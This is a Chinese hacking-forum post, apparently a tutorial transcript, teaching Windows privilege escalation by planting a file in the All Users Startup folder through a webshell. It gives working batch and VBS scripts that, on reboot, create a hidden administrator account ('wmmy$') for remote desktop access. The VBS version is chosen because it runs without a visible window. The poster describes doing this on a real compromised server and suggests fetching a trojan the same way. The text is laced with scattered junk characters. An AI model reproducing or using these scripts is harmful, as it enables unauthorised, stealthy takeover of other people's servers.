  
- 帖子
- 575
- 积分
- 1897
- 威望
- 2479
- 金钱
- 15914
- 在线时间
- 175 小时
             
|
大家好,我是完美蚂蚁 今天给大家带来的提权教程是
5 Z. Y; s% Q9 o, W% Y2 w启动 提权
4 h- k3 t# m; y; |3 J( b& Q# tC:\Docume~1\All Users\「开始」菜单\程序\启动
2 h( \8 x3 K" h' _3 t$ ^( ~8 T! ~在这里必须有写入权限 否则此方法无效
* P" ]9 p: J) B$ p/ l因为我是在网吧 这里显示不了路径/ j G3 Q' h$ ` n, C4 j. ]. b, R
我去服务器上演示给大家看
. h0 x4 v& O0 u. W1 ]6 S4 R大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的
]4 j. X6 g! q5 B文件 从而运行我们的文件
$ Y* I, K3 ?- ]% U3 o3 s! L5 }这里有两中方式 第一种是批处理. K% _% j3 j: p4 d- t4 l4 G7 y
我们来看下目前 我机器上的用户组# {; v" B2 C* M9 ], B9 Q# t2 M
目前我们没有521这个用户. S! i' s1 f( W0 P
看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示( D5 f& c) v) Q( d6 l- M9 X
大家看到了吧 如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现
; v3 e2 K" d% M) c) M( a1 E4 x下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的
5 W3 ^8 F& y; }4 _+ A* A大家看 已经成功加入了WMMY用户$ r* l7 U* P" I) ~/ @! F/ D$ G5 G
网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了
4 L; s/ [3 A' [9 b: T c当前终端服务端口: 3389
, g$ ?4 x9 Z$ s. @, a- t l- E3 ^系统自动登录功能未开启
5 g/ ]1 ]. `% |3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了
9 p' W! g- N: ?* m+ }5 ^* J7 @C:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径
9 @, c6 _& l5 H' \第一种隐蔽性太差 我们就用第二种吧: d5 h, R( X3 T0 f! g. h
已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去
( ^7 Q+ {" G3 D$ P4 X, m2 r从而取得了3389的登陆权限
4 M( M+ {. p3 l; J! c$ f其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马
$ W3 {& k/ l: J' p, M基本原理都差不多 我就不多介绍了( U, W+ I$ k1 I1 X' A4 f, M9 z- _
教程结束```& l' h2 S7 o9 _( ]4 n! D5 u' x
@echo off
1 @/ F" `& {5 j$ V5 Cnet user 521 521 /add8 U( X- l5 Z/ B
net localgroup administrators 521 /add @% d+ K; \) s: v6 e3 Y1 C5 \
9 I( B! v& ^: O* i, h* b
on Error Resume next
# C0 U* ^8 P T& dset wshshell=createobject("wscript.shell")
5 z8 [% S" G% J: i% ia=wshshell.run("net user wmmy$ 1227 /add",0)
! J9 ~$ U6 u$ B' Sa=wshshell.run("net localgroup administrators wmmy$ /add",0)0 E4 D5 `$ T$ \0 S m8 \4 e
9 ~* p* }7 e5 S
: w( O6 j4 }0 P8 v! B! M v点击下载. \6 x O9 b\" _4 \/ x
|
-
2
评分人数
-
|